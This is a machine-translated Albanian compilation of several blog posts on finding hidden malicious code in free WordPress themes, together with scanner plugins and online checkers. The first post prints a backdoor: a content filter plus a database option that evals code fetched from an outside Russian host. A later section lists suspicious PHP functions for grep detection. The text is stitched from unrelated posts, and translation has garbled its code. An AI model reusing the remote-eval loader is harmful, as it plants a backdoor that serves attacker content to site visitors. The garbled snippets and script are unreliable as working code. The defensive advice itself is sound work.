Përshëndetje shokë. A jeni i sigurt se shablloni falas i WordPress që përdorni për faqet e internetit dhe bloget tuaja është vërtet i sigurt dhe nuk përmban kërcënime të fshehura dhe kode me qëllim të keq? A jeni plotësisht i sigurt për këtë? Absolutisht?)
Ju mendoni se ata e kaluan shabllonin, hoqën lidhjet e fshehura prej tij dhe mbaroi. Ju skanoni periodikisht skedarët e faqes me një antivirus, shikoni mjetet e webmasterit Yandex në skedën e Sigurisë dhe, me lehtësi, shihni një mesazh atje: " Nuk u gjet asnjë kod keqdashës në sit«.
Kështu mendova edhe unë. Nuk dua të të mërzit, por...
Kodi i Fshehur i Rrezikshëm në Temat Falas të WordPress
Kjo është letra që mora javën e kaluar me postë nga pritja ime. Kohët e fundit, ata kanë futur një kontroll të rregullt të të gjithë skedarëve të faqes për përmbajtje me qëllim të keq, por megjithatë ata e gjetën këtë përmbajtje tek unë!
E gjitha filloi me faktin se një ditë shkova në faqen time dhe nuk mund ta hapja atë - doli një mbishkrim abuziv për skedarët e pagjetur me shtrirjen php. Pasi u tensionova pak, shkova të studioja përmbajtjen e dosjes me sitin në host dhe menjëherë zbulova një problem - skedari im i shabllonit fuctions.php u riemërua në functions.php.malware, i cili, si të thuash, la të kuptohet në mënyrë të paqartë - një antivirus ose diçka e tillë funksionoi këtu) Pasi hyra në postë, gjeta raportin e mësipërm nga hosti.
Gjëja e parë që bëra, natyrisht, ishte të kontrolloja dosjen e dhënë, studioi përmbajtjen e tij, e skanoi me antivirusë të ndryshëm, dhjetëra shërbimet online për kontrollin e viruseve etj. - në fund, nuk gjeta asgjë, të gjithë njëzëri pretenduan se dosja ishte plotësisht e sigurt. Sigurisht, unë i shpreha dyshimet e mia mikpritësit, duke thënë se keni ngatërruar diçka, por për çdo rast, i kërkova të jepnin një raport për zbulimin e një kodi keqdashës.
Dhe këtë më thanë
Shkova në google informacion në lidhje me këtë kod dhe mendova seriozisht për të ...
Si të gjeni një pjesë të kodit me qëllim të keq në një shabllon
Siç doli, ky është një truk vërtet jo i parëndësishëm që lejon palët e interesuara të transferojnë të dhëna në faqen tuaj dhe të ndryshojnë përmbajtjen e faqeve pa dijeninë tuaj! Nëse jeni duke përdorur një shabllon falas, atëherë Unë rekomandoj shumë të kontrolloni funksionet tuaja.php për kodin e mëposhtëm:
add_filter('the_content', '_bloginfo', 10001);
funksioni _bloginfo($content)(
global $post;
if(is_single() && ( [email i mbrojtur](get_option ('blogoption'))) !== false)(
kthimi $co;
) ndryshe ktheje $content;
}
Edhe me njohuritë e mia shumë të cekëta të php-së, mund të shihet se po krijohet një filtër i caktuar që është i lidhur me variablin global postimin dhe përmbajtjen, të cilat janë përgjegjëse për shfaqjen e përmbajtjes vetëm në faqet e postimeve të blogut (kusht është_single). Tashmë e dyshimtë, apo jo? Epo, tani le të shohim se çfarë do të shfaqë ky kod në faqen tonë të internetit.
Blogopcioni interesant i kërkuar në bazën e të dhënave gjithashtu duket shumë i dyshimtë. Shkojmë në bazën tonë Të dhënat e MySQL dhe ne gjejmë atje një tabelë të quajtur wp_options, nëse nuk i keni ndryshuar prefikset, atëherë do të duket kështu si parazgjedhje. Dhe në të gjejmë një linjë me interes për ne të quajtur blogoption
Çfarë bukurie! Ne shohim opsionin e mëposhtëm
ktheje eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));
ato. ne nga një sajt i caktuar (dhe vini re rusisht) kthejmë përmbajtje që mund të mbajë çdo gjë! Çdo numër lidhjesh, kode me qëllim të keq, tekst të ndryshuar, etj. Vetë faqja, kur hyn në të, jep një gabim aksesi 403, gjë që nuk është për t'u habitur. Sigurisht, e hoqa edhe këtë opsion nga baza e të dhënave.
Sipas informacioneve nga viktimat, pikërisht përmbajtja e artikullit tuaj zakonisht kthehet me vetëm një modifikim - në vend të ndonjë pike "." një lidhje e hapur ishte maskuar në tekst! Dhe meqë ra fjala, ky opsion shkruhet në bazën e të dhënave kur të instalohet vetë shablloni, dhe më pas kodi që e bën këtë vetë-shkatërrohet në mënyrë të sigurt. Dhe unë jetova me të tilla mbeturina për dy vjet, dhe asnjë antivirus apo shërbim nuk ma zbuloi atë këtë kërcënim për gjithë atë kohë. Për të qenë i sinqertë, nuk e vura re nëse kjo teknikë funksionoi ndonjëherë për mua, ose nëse shtojca ime e sigurisë e bllokoi këtë mundësi (ose ndoshta një nga përditësimet e WordPressa e mbylli këtë vrimë), por është ende e pakëndshme.
Morali i djathit falas
Si ju pëlqen sofistikimi i "përkthyesve" tanë të shablloneve (apo atyre që i postojnë në katalogët e tyre)? Nuk është për ju që të hiqni lidhjet nga fundi) Më vjen keq që nuk mbaj mend nga e kam shkarkuar shabllonin tim, ishte shumë kohë më parë, përndryshe do të kisha shkruar disa të dashur. Dhe nëse në atë kohë do të kisha të njëjtën përvojë që kam tani, atëherë definitivisht nuk do të përdorja një shabllon falas, ose, në raste ekstreme, nuk do të shkarkoja nga burime të panjohura!
Është më e lehtë të blesh një model premium zyrtar për 15-20 dollarë në të njëjtin dhe të jetosh në paqe duke ditur që nuk ka vrima dhe lidhje të koduara në të, dhe edhe nëse ka dobësi, zhvilluesit patjetër do të lëshojnë një përditësim në të cilin këto vrimat do të mbyllen. ( Nga rruga, Artem kohët e fundit botoi një artikull ku ai thjesht flet për shabllonet premium dhe madje shpërndan kode promovuese për zbritje brutale për ata që janë të interesuar)
WordPress është motori më i njohur për krijimin e faqeve dhe blogjeve të ndryshme informacioni. Siguria e faqes suaj të internetit është më shumë se siguria e të dhënave tuaja. Kjo është shumë më e rëndësishme, sepse është gjithashtu siguria e të gjithë përdoruesve që lexojnë burimin tuaj dhe i besojnë atij. Kjo është arsyeja pse është kaq e rëndësishme që faqja të mos jetë e infektuar me viruse ose ndonjë kod tjetër me qëllim të keq.
Ne do të mbulojmë se si të mbroni WordPress nga hakerimi në një nga artikujt e mëposhtëm, por tani dua t'ju tregoj se si të kontrolloni faqen tuaj të WordPress për viruse dhe kode me qëllim të keq për t'u siguruar që gjithçka është e sigurt.
Opsioni i parë që ju vjen në mendje është se hakerët ju kanë hakuar dhe kanë ndërtuar prapaskenat e tyre në kodin e faqes tuaj në mënyrë që të jenë në gjendje të dërgojnë spam, të vendosin lidhje dhe gjëra të tjera të këqija. Kjo ndodh ndonjëherë, por është mjaft e rrallë nëse përditësoni softuerin në kohë.
Ka mijëra tema dhe shtojca falas të WordPress atje, dhe këtu qëndron rreziku. Është një gjë kur shkarkoni një shabllon nga një faqe WordPress dhe krejt tjetër kur e gjeni në faqen e majtë. Zhvilluesit e paskrupullt mund të futin kode të ndryshme me qëllim të keq në produktet e tyre. Ekziston edhe më shumë rrezik nëse shkarkoni shabllone premium falas, ku hakerët nuk rrezikojnë asgjë dhe mund të shtojnë një lloj vrime sigurie përmes së cilës më pas mund të depërtojnë dhe të bëjnë atë që u nevojitet. Kjo është arsyeja pse është kaq e rëndësishme të kontrolloni faqen tuaj të wordpress për viruse.
Kontrollimi i faqes wordpress për viruse
Gjëja e parë që duhet parë kur kontrolloni një faqe nuk janë viruset, janë shtojcat e WordPress. Shpejt dhe lehtë, ju mund të skanoni faqen tuaj dhe të gjeni seksione të dyshimta të kodit që ia vlen t'i kërkoni, qofshin ato në një temë, një shtojcë ose në thelbin e vetë Wodpress. Le të hedhim një vështrim në disa nga shtojcat më të njohura:
1.TOC
Kjo shtojcë shumë e thjeshtë kontrollon të gjitha temat e instaluara në faqen tuaj për kod me qëllim të keq. Shtojca zbulon lidhje të fshehura të koduara me futjen e kodit base64 dhe gjithashtu shfaq informacion i detajuar për problemet e gjetura. Më shpesh, pjesët e gjetura të kodit nuk janë viruse, por ato mund të jenë potencialisht të rrezikshme, kështu që duhet t'u kushtoni vëmendje atyre.
hapur "Pamja e jashtme" -> "TAC" pastaj prisni derisa të kontrollohen të gjitha temat.
2.Skaner VIP
Shumë i ngjashëm me skanerin e temave TOC, por me informacion më të detajuar. Të njëjtat mundësi për të zbuluar lidhje, kode të fshehura dhe inserte të tjera me qëllim të keq. Thjesht hapni artikullin Skaneri VIP në seksionin e veglave dhe analizoni rezultatin.
Mund të jetë e mjaftueshme për të fshirë skedarët e panevojshëm, për shembull, desktop.ini. Ose duhet të shikoni më nga afër se çfarë ndodh në skedarët duke përdorur base64.
3. Anti-Malware nga GOTMLS.NET
Kjo shtojcë ju lejon jo vetëm të skanoni temat dhe thelbin e faqes për viruse, por edhe të mbroni faqen nga forca brutale e fjalëkalimit dhe sulmet e ndryshme XSS, SQLInj. Kërkimi kryhet në bazë të nënshkrimeve dhe dobësive të njohura. Disa dobësi mund të rregullohen në vend. Për të filluar skanimin e skedarëve hapeni "Anti Malvare" në shiritin anësor dhe klikoni "Ekzekuto skanimin":
Përpara se të kryeni një skanim, duhet të përditësoni bazat e të dhënave të nënshkrimit.
4.Fjalëmbrojtja
Ky është një nga shtojcat më të njohura të sigurisë dhe skanimit të malware të WordPress. Përveç skanerit, i cili mund të gjejë shumicën e faqeshënuesve në kodin e WordPress, ekziston mbrojtje në kohë reale kundër lloje te ndryshme sulmet dhe sulmet me forcë brutale. Gjatë kërkimit, shtojca gjen problemet e mundshme me shtojca dhe tema të ndryshme, ju thotë të përditësoni WordPress.
Hapni një skedë "WP Defense" në shiritin anësor dhe më pas shkoni te skeda "Skano" dhe shtypni "Fillimi i skanimit":
Skanimi mund të marrë kohë të caktuar, por pas përfundimit, do të shihni një raport të detajuar të çështjeve të gjetura.
5.Antivirus
Ky është një tjetër shtojcë e thjeshtë që do të skanojë shabllonin e faqes suaj të internetit për kod me qëllim të keq. Disavantazhi është se vetëm shablloni aktual skanohet, por informacioni shfaqet me detaje të mjaftueshme. Do të shihni të gjitha tiparet e rrezikshme që ka tema dhe më pas mund të analizoni në detaje nëse ato paraqesin ndonjë rrezik. Gjeni një artikull "Antivirus" në cilësimet dhe më pas klikoni "Skanoni modelet e temave tani":
6. Kontrolluesi i integritetit
Këshillohet gjithashtu të kontrolloni integritetin e skedarëve të WordPress, në rast se virusi tashmë është regjistruar diku. Për ta bërë këtë, mund të përdorni shtojcën Integrity Checker. Ai kontrollon të gjitha skedarët bazë, shtojcat dhe shabllonet për ndryshime. Në fund të skanimit, do të shihni informacione rreth skedarëve të modifikuar.
Shërbimet online
Ekzistojnë gjithashtu disa shërbime në internet që ju lejojnë të kontrolloni faqen tuaj të wordpress për viruse ose thjesht të kontrolloni shabllonin. Ja disa prej tyre:
themecheck.org- ju shkarkoni arkivin e temave dhe mund të shihni të gjitha paralajmërimet në lidhje me funksionet e mundshme me qëllim të keq që përdoren në të. Ju nuk mund të shikoni vetëm informacione për temën tuaj, por edhe për tema të tjera të ngarkuara nga përdorues të tjerë, si dhe rreth versione të ndryshme temave. Çdo gjë që gjejnë shtojcat mund të gjendet nga kjo faqe. Ekzaminimi temat e wordpressështë gjithashtu shumë e rëndësishme.
virustotal.com- një burim i njohur ku mund të kontrolloni faqen tuaj ose skedarin e shabllonit për viruse.
ReScan.pro- Kontrollimi i një faqeje WordPress për viruse duke përdorur këtë shërbim është falas, kryhet analiza statike dhe dinamike për të zbuluar ridrejtimet e mundshme. Skaneri hap faqet e faqes. Kontrollon faqen kundrejt listave të zeza të ndryshme.
sitecheck.sucuri.net- një shërbim i thjeshtë për skanimin e faqes dhe temave për viruse. Ekziston një shtojcë për WordPress. Zbulon lidhjet dhe skriptet e rrezikshme.
Kontroll manual
Asgjë nuk mund të jetë më e mirë se verifikimi manual. Linux ka një mjet të mrekullueshëm grep që ju lejon të kërkoni për shfaqje të vargjeve arbitrare në një dosje me skedarë. Mbetet për të kuptuar se çfarë do të kërkojmë:
eval - ky funksion ju lejon të ekzekutoni një arbitrar kodi php, produktet që respektojnë veten nuk e përdorin atë, nëse një nga shtojcat ose tema e përdor këtë funksion, është pothuajse 100% e sigurt që ka një virus atje;
- base64_decode- Funksionet e enkriptimit mund të përdoren me eval për të fshehur kodin keqdashës, por ato mund të përdoren edhe për qëllime paqësore, prandaj kini kujdes;
- sha1- një metodë tjetër e kriptimit të kodit me qëllim të keq;
- gzinflate- funksioni i kompresimit, qëllime të njëjta, së bashku me eval, p.sh. gzinflate(base64_decode(code);
- strrev- e kthen vargun prapa jo më parë, pasi një variant mund të përdoret për kriptim primitiv;
- shtypur- printon informacion në shfletues, së bashku me gzinflate ose base64_decode është i rrezikshëm;
- file_put_përmbajtja- Vetë WordPress ose shtojcat mund të krijojnë ende skedarë në sistemin e skedarëve, por nëse tema e bën këtë, atëherë duhet të jeni të kujdesshëm dhe të kontrolloni pse i nevojitet, pasi viruset mund të instalohen;
- file_get_contents- në shumicën e rasteve përdoret për qëllime paqësore, por mund të përdoret për të shkarkuar kode me qëllim të keq ose për të lexuar informacione nga skedarët;
- kaçurrela- e njëjta histori;
- hap- hap një skedar për të shkruar, nuk e di se çfarë;
- sistemi- funksioni ekzekuton një komandë në një sistem Linux, nëse bëhet nga vetë një temë, plugin ose wordpress, ka shumë të ngjarë që ka një virus;
- lidhje simbolike- krijon lidhje simbolike në sistem, ndoshta virusi po përpiqet të bëjë kryesorin sistemi i skedarëve në dispozicion nga jashtë;
- kopje- kopjon një skedar nga një vend në tjetrin;
- getcwd- kthen emrin e drejtorisë aktuale të punës;
- cwd- ndryshon dosjen aktuale të punës;
- ini_get- merr informacion rreth cilësimeve të PHP-së, shpesh për qëllime paqësore, por nuk e dini kurrë;
- raportimi i gabimit (0)- çaktivizon daljen e çdo mesazhi gabimi;
- dritare.lart.lokacioni.href- funksioni javascript i përdorur për ridrejtime në faqe të tjera;
- hakuar- kështu që, për çdo rast, kontrollojmë, befas, vendosi të na tregojë vetë hakeri.
Ju mund të zëvendësoni çdo fjalë individuale në një komandë si kjo:
grep -R "hacked" /var/www/path/to/files/wordpress/wp-content/
Ose përdorni një skenar të thjeshtë që do të kërkojë të gjitha fjalët menjëherë:
vlerat = "base64_dekode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
dritare.lart.lokacioni.href
kopjoni(
vlerësoj(
sistem(
lidhje simbolike (
raportimi i gabimit (0)
shtypur
file_get_contents(
file_put_përmbajtja (
hap (
i hakuar"
cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --përfshi \*.php "$values" *
Përshëndetje miq Idea Fox!
Unë nuk e di për ju, por unë nuk fle mirë natën. Çështjet e sigurisë së blogut më mundojnë. Nuk ka më fuqi :-)
Kam lexuar një mori blogjesh për këtë temë dhe kam testuar shumë shtojca që ndihmojnë në zgjidhjen e këtij problemi. Po, dhe në komentet ata filluan të bëjnë pyetje mbi temën e mbrojtjes së sitit, gjë që më shtyu të shkruaj këtë shënim.
Vetëm imagjinoni se jeni duke bërë blogje, duke shkruar artikuj, duke u përpjekur ... Dhe gomarët e këqij vijnë dhe thyejnë faqen tuaj. Mendoj se do të ketë shumë zhgënjime.
Në fund të fundit, çdo bloger normal investon shumë kohë dhe përpjekje në zhvillimin e faqes së tij. Dhe për shumë njerëz, blogimi në përgjithësi bëhet një obsesion ... Këtu e lart, nëse ndodh GJITHË :-)
Epo, ju e kuptoni se sa e rëndësishme është kjo.
Më në fund le t'i drejtohemi biznesit :)
Disa muaj më parë kam shkruar tashmë një shënim për diçka nga hakerimi. Sigurohuni që ta lexoni. Por që atëherë ka kaluar shumë kohë dhe unë kam marrë masa shtesë për të forcuar mbrojtjen e gjithanshme.
Në shënimet e mëposhtme do të ndalem patjetër në këtë çështje në detaje. (Unë gjithashtu mbaj mend dhe shkruaj për ngritjen e ISP-së)
3. Ne kontrollojmë faqen në shërbime të tjera online
Shërbime të tilla u divorcuan në dukje-në mënyrë të padukshme. Unë kam një mendim të fortë se shumë prej tyre janë krejtësisht budallenj dhe janë krijuar vetëm për të shfaqur reklama.
Doktor Web
DR.Ueb i bërë shërbim i mirë për të kontrolluar faqet e internetit në internet. Personalisht, ai më ndihmoi një herë të gjeja një infeksion nga një mik në blog (Kishte një kod të palës së tretë në skedarin .htaccess)
Kontrolli është shumë i thjeshtë. Futni URL-në tuaj dhe prisni rezultatin e kontrollit.
antivirus-alarm.com
Një zvarritës i fuqishëm i faqes në internet që përdor deri në 43 bazat e të dhënave antivirus nga kompanitë kryesore antivirus në botë.
Edhe këtu, gjithçka është shumë e thjeshtë. Ne futemi në URL-në e faqes sonë dhe me frymë të lodhur presim rezultatet e skanimit.
Kjo është ajo që kam pritur.
Gjithçka është e pastër, ju mund të flini të qetë :-)
E gjithë kjo është sigurisht e mirë, por gjithashtu duhet të instaloni disa shtojca që nuk ndërhyjnë fare me blogjet e WordPress.
4. Kërkojini hostit të kontrollojë faqen tuaj
Fakti është se hostet janë edhe më të shqetësuar për çështjet e sigurisë sesa ju dhe kanë mjete të fuqishme mbrojtëse. Dhe mjete të specializuara mbrojtjeje.
Këtu është lajmi im për ju sot. Më tej, unë do të flas për shtojcë e fuqishme, i cili ju lejon të mbroni ndjeshëm blogun tuaj të WordPress nga hakerimi.
Kam 2 muaj që punoj me të dhe jam shumë i kënaqur me të. Deri tani jam marrë 3 herë me të dhe e kam ndaluar veten: -) Me pak fjalë, ka diçka për të thënë.
Nje nga piketa kur krijoni një blog - zgjidhni një shabllon me cilësi të lartë. Ka shumë site, si me pagesë ashtu edhe falas. Megjithatë, këtu duhet të jeni të kujdesshëm, pasi ekziston një probabilitet i lartë që së bashku me skedarin të merrni viruse, skripte me qëllim të keq dhe lidhje të fshehura.
Por edhe nëse shablloni është i pastër për sa i përket sigurisë, dhe dizajni, përdorshmëria dhe funksionaliteti i tij ju përshtatet plotësisht, kjo nuk do të thotë që gjithçka është në rregull. Tema duhet të ketë kod të vlefshëm HTML dhe CSS, si dhe të jetë në përputhje me të gjitha standardet CMS WordPress. Edhe temat me pagesë dhe shabllonet e bërë me porosi kanë probleme me këtë të fundit.
Zhvilluesit e motorëve po e zhvillojnë vazhdimisht atë dhe autorët e shablloneve nuk i përmbahen gjithmonë, duke përdorur funksione të vjetruara gjatë krijimit të tyre.
Sot do t'ju tregoj 2 mënyra për të kontrolluar temat e WordPress për pajtueshmërinë me standardet. Këto mjete përdoren kur shtohen në drejtorinë zyrtare https://wordpress.org/themes/
Shërbim për kontrollimin e temave të WordPress dhe shablloneve të Joomla për pajtueshmëri me standardet
ThemeCheck.org është shërbim falas, i cili ju lejon të kontrolloni sigurinë dhe cilësinë e shablloneve për CMS WordPress dhe Joomla përpara se të instaloni në sajt.
Për të kontrolluar një temë, ngarkoni arkivin e saj nga kompjuteri juaj duke klikuar butonin "Zgjidh skedarin" në faqen e internetit themecheck.org. Nëse nuk dëshironi që rezultatet e skanimit të ruhen në shërbim dhe të vihen në dispozicion të përdoruesve të tjerë, kontrolloni " Harrojini të dhënat e ngarkuara pas rezultateve“. Tani shtypni butonin "Dërgo".
Për shembull, mora temën Ndërfaqja shkarkuar nga faqja zyrtare. 99 nga 100 - 0 gabime kritike dhe 1 paralajmërim. Ky është një rezultat shumë i mirë.
Në krahasim, shablloni im i blogut mori një rezultat prej 0 (14 gabime dhe 23 paralajmërime). Unë mendoj se për shumë, rezultatet nuk do të ndryshojnë shumë, veçanërisht nëse temat janë tashmë të vjetruara. Të gjitha komentet me shpjegime, duke treguar dosjet dhe rreshtat ku janë gjetur, gjenden në të njëjtën faqe më poshtë.
Sinqerisht, nuk kuptova shumë atje, do të jetë më e dobishme për autorët dhe është më e lehtë për mua të ndryshoj shabllonin sesa të rregulloj gjithçka. Thjesht nuk e di se kur do ta arrij.
Home ka një përzgjedhje të madhe të temave të uebit të WordPress dhe Joomla të testuara më parë me aftësinë për të renditur sipas kohës së shtuar ose të vlerësuar. Kur klikoni mbi to, mund të shihni informacione të hollësishme dhe lidhje me faqen e internetit të autorit dhe faqen e shkarkimit.
Nëse jeni një zhvillues dhe tema juaj është 100% e vlefshme, mund t'i njoftoni përdoruesit për të duke vendosur një distinktiv të veçantë vlerësimi në të.
Vlera e shërbimit ThemeCheck.org është se çdo webmaster mund ta përdorë atë për të zgjedhur një temë cilësore edhe përpara se të instalohet në blog.
Shtojca e kontrollit të temës
Ju mund të kontrolloni një shabllon të instaluar tashmë për përputhshmëri me standardet më të fundit të WordPress duke përdorur shtojcën "Kontrolli i temave". Link për të shkarkuar Versioni i fundit: https://wordpress.org/plugins/theme-check/
Funksionaliteti i shtojcës është i ngjashëm me shërbimin që përshkrova më sipër. Nuk ka nevojë të bëni asnjë cilësim pas instalimit dhe aktivizimit standard. Renditja e kontrollit:
- Shkoni te paneli i administratorit në faqen e menysë " Pamja"-" Kontrolli i temës".
- Zgjidhni temën e dëshiruar nga lista rënëse nëse ka disa të instaluara.
- Kontrolloni kutinë "Suppress INFO" nëse nuk dëshironi të dërgoni informacion.
- Klikoni në butonin "Kontrollojeni".
Rezultatet do të shfaqen në të njëjtën faqe.
Siç mund ta shihni, tema e paracaktuar Njëzet e dhjetë nuk është gjithashtu ideale, por, për shembull, Njëzet e katërmbëdhjetë nuk ka gabime.
Pasi të keni kontrolluar shtojcën, mund ta çaktivizoni atë dhe është më mirë ta fshini fare deri herën tjetër.
konkluzioni. Përpara se të instaloni një shabllon të ri WordPress, kontrolloni atë jo vetëm për lidhje të fshehura dhe kod me qëllim të keq me shtojcën TAC, por edhe me shërbimin ThemeCheck.org ose shtesën e Kontrollit të Temave për përputhje me standardet më të fundit CMS.
P.S. Gjatë shfletimit të TopSape Reader kohët e fundit, pashë një blog të ri SEO zenpr.ru, i cili mban vendin e parë midis blogerëve për sa i përket klikimeve në muaj. Duke qenë se mosha e tij është pak më shumë se një muaj, rezultati është i denjë për respekt. Dizajn në stilin e minimalizmit, nëse jo për të thënë se nuk ekziston fare, por autori shkruan - do ta lexoni. Gjithë biznesi dhe pa ujë. Ashtu si në titullin e blogut - "zero karaktere shtesë". Unë rekomandoj të lexoni, do të gjeni shumë informacione të dobishme.
Ka shumë shabllone falas në internet në internet. Se djathë falas kjo ndodh vetëm në një kurth miu, të gjithë e dinë dhe ende dora shtrihet për të shkarkuar një të tillë falas dhe instaluar në faqen tuaj të internetit.
Përpara se të instaloni një shabllon falas, nuk do të dëmtonte ta kontrolloni atë për lidhje të fshehura.
Duke vendosur një shabllon falas, shumë as nuk supozojnë se thjesht nuk mund të promovojnë dhe fitojnë para në një faqe të tillë.
Në një shabllon të tillë, mund të ketë disa lidhje njëherësh. Është gjithashtu mirë nëse lidhjet e mbivendosura janë në një faqe të ngjashme me temën tuaj dhe jo në sajte për të rritur. Dhe do të jenë vetëm dy ose tre prej tyre, jo dhjetëra.
Si e kërcënon faqen tuaj instalimi i një shablloni të tillë falas? Faqja do të bjerë nën filtër, dalja nga e cila është pothuajse e pamundur. Një sajt nën filtra është një faqe e vdekur!
Instalimi i një shablloni falas në faqen tuaj është si të luani ruletë ruse. E vetmja mundësi për të vendosur absolutisht model i pastër, është e barabartë me zero.
Në rastin më të mirë, do të merrni 3-5 lidhje të majta në faqen tuaj. Sigurisht, mund të përpiqeni të pastroni një shabllon të tillë, por ka zejtarë që futin lidhjet në shabllon në atë mënyrë që ato të mos hiqen prej andej (shaboni është i prishur, ai thjesht deformohet).
Për të qenë i sinqertë, është më e lehtë të porosisni një shabllon të ri të pastër dhe unik (që nuk mund të thuhet falas), do të kushtojë më pak.
Për shembull, unë paguaj 200 rubla për krijimin e një shablloni (shkruaj në Skype: oxamitta). Më thuaj, a ia vlen? Merrni falas dhe humbni faqen, por kurseni 200 rubla? Wow kursime!!!
Por, çka nëse tashmë keni vënë bast në një shabllon falas? Si të kontrolloni një shabllon për lidhje të fshehura?
Ekziston një shtojcë e veçantë për këtë. Nuk do të ndihmojë heqja e këtyre lidhjeve, por identifikimi i tyre - ju lutem.
Ndoshta jo gjithçka është aq e frikshme dhe shablloni juaj ka vetëm disa lidhje të jashtme! Dëshiron të testosh shabllonin? Më pas shkarkoni plugin-in nga lidhja më poshtë (për të parë lidhjen për të shkarkuar shtesën, klikoni në një nga butonat e rrjeteve sociale).
Shtojca është instaluar në panelin e administratorit të faqes në mënyrë standarde. Nuk ka kuptim të xhironi në lidhje me këtë video, kështu që sot do t'ia dalim me disa pamje nga ekrani.
Instaloni shtojcën dhe aktivizojeni.
Për të zmadhuar pamjen e ekranit, klikoni mbi të me butonin e majtë të miut. 
Shkoni te skeda Paraqitja, TAS.
Po ngarkohet...